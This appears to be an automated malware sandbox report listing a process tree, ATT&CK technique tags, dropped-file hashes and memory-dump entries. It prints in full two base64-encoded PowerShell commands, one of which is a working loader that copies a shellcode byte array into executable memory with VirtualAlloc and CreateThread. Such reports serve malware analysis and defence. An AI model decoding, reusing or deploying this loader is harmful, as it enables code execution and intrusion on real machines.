bABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB3AHkAegBWACkAKQA7ACQANwBxADEAWAAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGIAWgBMACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGIAWgBMACAAJAA3AHEAMQBYACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkADcAcQAxAFgAIAAkAGUAIgA7AH0A
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2976
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABvAFMAUwBaACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbwBTAFMAWgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGIALAAwAHgANQA3ACwAMAB4ADAAMQAsADAAeABhADkALAAwAHgAZgBhACwAMAB4AGQAOQAsADAAeABlADgALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAYQAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGYALAAwAHgAOAAzACwAMAB4AGUAYQAsADAAeABmAGMALAAwAHgAMwAxACwAMAB4ADUAYQAsADAAeAAxADEALAAwAHgAMAAzACwAMAB4ADUAYQAsADAAeAAxADEALAAwAHgAZQAyACwAMAB4AGEAMgAsADAAeABmAGQALAAwAHgANAAxACwAMAB4ADcAOAAsADAAeAA0AGMALAAwAHgAZgBlACwAMAB4ADkAMQAsADAAeAAxAGQALAAwAHgAYwA1ACwAMAB4ADEAYgAsADAAeABhADAALAAwAHgAMQBkACwAMAB4AGIAMQAsADAAeAA2ADgALAAwAHgAOQAzACwAMAB4AGEAZAAsADAAeABiADIALAAwAHgAMwBkACwAMAB4ADEAOAAsADAAeAA0ADUALAAwAHgAOQA2ACwAMAB4AGQANQAsADAAeABhAGIALAAwAHgAMgBiACwAMAB4ADMAZQAsADAAeABkADkALAAwAHgAMQBjACwAMAB4ADgAMQAsADAAeAAxADgALAAwAHgAZAA0ACwAMAB4ADkAZAAsADAAeABiAGEALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAAxAGUALAAwAHgAYwAxACwAMAB4ADgAYwAsADAAeAA1ADcALAAwAHgAMQBmACwAMAB4ADAAYQAsADAAeABjADEALAAwAHgAOQA2ACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgAMgBiACwAMAB4AGMAYQAsADAAeAAzADEALAAwAHgAZgAzACwAMAB4ADkAOQAsADAAeABmAGIALAAwAHgAMwA2ACwAMAB4ADQAOQAsADAAeAAyADEALAAwAHgANwA3ACwAMAB4ADAANAAsADAAeAA1AGYALAAwAHgAMgAxACwAMAB4ADYANAAsADAAeABkAGQALAAwAHgANQBlACwAMAB4ADAAMAAsADAAeAAzAGIALAAwAHgANQA1ACwAMAB4ADMAOQAsADAAeAA4ADIALAAwAHgAYgBkACwAMAB4AGIAYQAsADAAeAAzADEALAAwAHgAOABiACwAMAB4AGEANQAsADAAeABkAGYALAAwAHgANwBjACwAMAB4ADQAMgAsADAAeAA1AGQALAAwAHgAMgBiACwAMAB4ADAAYQAsADAAeAA1ADUALAAwAHgAYgA3ACwAMAB4ADYANQAsADAAeABmADMALAAwAHgAZgA5ACwAMAB4AGYANgAsADAAeAA0ADkALAAwAHgAMAA2ACwAMAB4ADAAMAAsADAAeAAzAGUALAAwAHgANgBkACwAMAB4AGYAOQAsADAAeAA3ADcALAAwAHgAMwA2ACwAMAB4ADgAZAAsADAAeAA4ADQALAAwAHgAOABmACwAMAB4ADgAZAAsADAAeABlAGYALAAwAHgANQAyACwAMAB4ADEAYQAsADAAeAAxADYALAAwAHgANQA3ACwAMAB4ADEAMAAsADAAeABiAGMALAAwAHgAZgAyACwAMAB4ADYAOQAsADAAeABmADUALAAwAHgANQBhACwAMAB4ADcAMAAsADAAeAA2ADUALAAwAHgAYgAyACwAMAB4ADIAOQAsADAAeABkAGUALAAwAHgANgBhACwAMAB4ADQANQAsADAAeABmAGUALAAwAHgANQA0ACwAMAB4ADkANgAsADAAeABjAGUALAAwAHgAMAAxACwAMAB4AGIAYgAsADAAeAAxAGUALAAwAHgAOQA0ACwAMAB4ADIANQAsADAAeAAxAGYALAAwAHgANwBhACwAMAB4ADQAZQAsADAAeAA0ADQALAAwAHgAMAA2ACwAMAB4ADIANgAsADAAeAAyADEALAAwAHgANwA5ACwAMAB4ADUAOAAsADAAeAA4ADkALAAwAHgAOQBlACwAMAB4AGQAZgAsADAAeAAxADIALAAwAHgAMgA0ACwAMAB4AGMAYQAsADAAeAA1ADIALAAwAHgANwA5ACwAMAB4ADIAMQAsADAAeAAzAGYALAAwAHgANQBlACwAMAB4ADgAMgAsADAAeABiADEALAAwAHgANQA3ACwAMAB4AGUAOQAsADAAeABmADEALAAwAHgAOAAzACwAMAB4AGYAOAAsADAAeAA0ADEALAAwAHgAOQBlACwAMAB4AGEAZgAsADAAeAA3ADEALAAwAHgANABmACwAMAB4ADUAOQAsADAAeABjAGYALAAwAHgAYQBiACwAMAB4ADMANwAsADAAeABmADUALAAwAHgAMgBlACwAMAB4ADUANAAsADAAeAA0ADcALAAwAHgAZABmACwAMAB4AGYANAAsADAAeAAwADAALAAwAHgAMQA3ACwAMAB4ADcANwAsADAAeABkAGMALAAwAHgAMgA4ACwAMAB4AGYAYwAsADAAeAA4ADcALAAwAHgAZQAxACwAMAB4AGYAYwAsADAAeAA1ADIALAAwAHgAZAA4ACwAMAB4ADQAZAAsADAAeABhAGYALAAwAHgAMQAyACwAMAB4ADgAOAAsADAAeAAyAGQALAAwAHgAMQBmACwAMAB4AGYAYQAsADAAeABjADIALAAwAHgAYQAxACwAMAB4ADQAMAAsADAAeAAxAGEALAAwAHgAZQBkACwAMAB4ADYAYgAsADAAeABlADkALAAwAHgAMwAyACwAMAB4ADAANQAsADAAeAA5ADQALAAwAHgAMQA2ACwAMAB4AGMAMgAsADAAeAA0ADIALAAwAHgAZgA1ACwAMAB4ADcANQAsADAAeABhADkALAAwAHgAZgA3ACwAMAB4ADgANwAsADAAeAA0AGIALAAwAHgAMQBlACwAMAB4AGMAMAAsADAAeAA1ADEALAAwAHgAOAAyACwAMAB4ADAANAAsADAAeAA0ADUALAAwAHgAZgBkACwAMAB4AGIAMQAsADAAeABhADAALAAwAHgAYwBiACwAMAB4ADcAMgAsADAAeAA2ADgALAAwAHgANAA3ACwAMAB4ADYANgAsADAAeAAxADIALAAwAHgANwA0ACwAMAB4AGYAZgAsADAAeAAyAGYALAAwAHgAZgA0ACwAMAB4ADQAMAAsADAAeAA3AGYALAAwAHgAZAAwACwAMAB4AGQAMAAsADAAeAAyADIALAAwAHgAMwBmACwAMAB4ADMAMwAsADAAeABiADEALAAwAHgAMwBlACwAMAB4AGUAZgAsADAAeAAyADMALAAwAHgANAA3ACwAMAB4ADMAZgAsADAAeAAxAGUALAAwAHgAZQA4ACwAMAB4AGMAZQAsADAAeABkADkALAAwAHgANABhACwAMAB4ADAAMAAsADAAeAA4ADcALAAwAHgANwAyACwAMAB4AGUAMgAsADAAeABiADkALAAwAHgAOAAyACwAMAB4ADAAOQAsADAAeAA5ADMALAAwAHgANAA2ACwAMAB4ADEAOQAsADAAeAA3ADQALAAwAHgAOQAzACwAMAB4AGMAZAAsADAAeABhAGUALAAwAHgAOAA4ACwAMAB4ADUAZAAsADAAeAAyADYALAAwAHgAZABhACwAMAB4ADkAYQAsADAAeAAwADkALAAwAHgAYwA2ACwAMAB4ADkAMQAsADAAeABjADEALAAwAHgAOQBmACwAMAB4AGQAOQAsADAAeAAwAGYALAAwAHgANgBmACwAMAB4ADEAZgAsADAAeAA0AGMALAAwAHgAYgA0ACwAMAB4ADIANgAsADAAeAA0ADgALAAwAHgAZgA4ACwAMAB4AGIANgAsADAAeAAxAGYALAAwAHgAYgBlACwAMAB4AGEANwAsADAAeAA0ADkALAAwAHgANABhACwAMAB4AGIANQAsADAAeAA2AGUALAAwAHgAZABjACwAMAB4ADMANQAsADAAeABhADEALAAwAHgAOABlACwAMAB4ADMAMAAsADAAeABiADYALAAwAHgAMwAxACwAMAB4AGQAOQAsADAAeAA1AGEALAAwAHgAYgA2ACwAMAB4ADUAOQAsADAAeABiAGQALAAwAHgAMwBlACwAMAB4AGUANQAsADAAeAA3AGMALAAwAHgAYwAyACwAMAB4AGUAYQAsADAAeAA5ADkALAAwAHgAMgBkACwAMAB4ADUANwAsADAAeAAxADUALAAwAHgAYwA4ACwAMAB4ADgAMgAsADAAeABmADAALAAwAHgANwBkACwAMAB4AGYANgAsADAAeABmAGQALAAwAHgAMwA3ACwAMAB4ADIAMgAsADAAeAAwADkALAAwAHgAMgA4ACwAMAB4AGMANgAsADAAeAAxAGUALAAwAHgAZABjACwAMAB4ADEANAAsADAAeABiAGMALAAwAHgANABlACwAMAB4AGQAYwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAMgBLAEsAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkADIASwBLAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJAAyAEsASwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwA=
      4⤵
      Blocklisted process makes network request
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2636
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7_rgm7qx.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2664
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE679.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE678.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2648

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7_rgm7qx.dll

Filesize
3KB

MD5
043561810cc1c03dc008ab0f425a7641

SHA1
d405dad135510a0b454b563378a1cf488e63135d

SHA256
05eb4cf8382ce3ded971c3f65af9415dd97dc1ed41ee01df2a02fdf03d9a6968

SHA512
510c5bdf3b3cd5c86bffc2c4441ecd6030b108b25cc669b33f610fd5807a01faf633625f43764d2da00c988a0b460a4710abde065222c4cf44a1435986b09e50

Download Submit
C:\Users\Admin\AppData\Local\Temp\7_rgm7qx.pdb

Filesize
7KB

MD5
291a7b16cbe4196553e83e10cbd43a4d

SHA1
5cc46adad704cdeaf0d35074bb7edd4a6cf6d8c7

SHA256
348a825c32e361f3874b0934cf44a8ade3cce947ae442c4479077c3e69a1c861

SHA512
4335b24a052b524c895db093f2619673549aed19ac0ab15f5819d29bdd9dacae6ef03a4e2850fc9bdb10c794281b8a3b6abf7f766533c6913f529fc3fd5c4281

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE679.tmp

Filesize
1KB

MD5
89503c0be8d673ca14dc836cb9e260c3

SHA1
398efcfeb093f423b642d9924f0adae1d4755187

SHA256
ce6a899f030aad7d2b6ca92f47d03e42e5f40569830d4380e6b00f3c97ca3ee6

SHA512
a9e4e8d34ab2b7850a1e32b60848c7590c224e1179994379531ae6df1992845c5f82fcdb85540a587a9dc3c30316e2c163a2b26e01a593bc2799f08ca6b44fbf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
9f16ac20d38cebe969be2ba40eb2a69e

SHA1
9b34f18ab6315585cef701ed544afa35ff4701f4

SHA256
bd89b692fd9a3467fc4a88ec44b9a179eea8deda0e9c45e05470d32a8312052c

SHA512
525d83c3911fe0a9ccf8c323904c56bb88a269205380040e234b0fc2f6e33d5acabbfb31de757961cd77049f7ff9206951ff770ae301208fbe8e92722ed84f16

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\7_rgm7qx.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\7_rgm7qx.cmdline

Filesize
309B

MD5
ca565e4e782dc5810972d3169aad1d43

SHA1
4ae119e6e330311ba80c29d8200e4e4f45190567

SHA256
c185a88dda428701628355037937f2b2b93554dbae69ac48be059a3c3df5ec32

SHA512
68f778f4cc8ca0eca574ee27e8f39c31010ccf77f5e238d973bec3c485a0ad4ab942f0259b1e974e671bf7d43fe389fd3b4dbd8bd3945fb8c4ab26ec100f0338

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCE678.tmp

Filesize
652B

MD5
09eb28ae0735be768b3761910971b213

SHA1
d48502158300f359e0837e240c53b335492b55c4

SHA256
8e3c2517d1f5296d8319232dc1a587cb494b5d7fe802a1c117f5aca28d415e86

SHA512
17188084f8b6efaabbad81a4ec16f504cfff7e9e6eae3258c1b71bef3c2779d3c917b02ddeeee419020ed254ea15e3829d13b44a138ca8f82e1a02943dd26cf8

Download Submit
memory/1936-13-0x000007FEF6560000-0x000007FEF6EFD000-memory.dmp

Filesize
9.6MB

Download
memory/1936-7-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/1936-6-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

Filesize
2.9MB

Download
memory/1936-5-0x000007FEF681E000-0x000007FEF681F000-memory.dmp

Filesize
4KB

Download
memory/1936-32-0x000007FEF6560000-0x000007FEF6EFD000-memory.dmp

Filesize
9.6MB

Download
memory/2336-0-0x0000000000400000-0x0000000000452000-memory.dmp

Filesize
328KB

Download
memory/2636-31-0x00000000054C0000-0x00000000054C1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads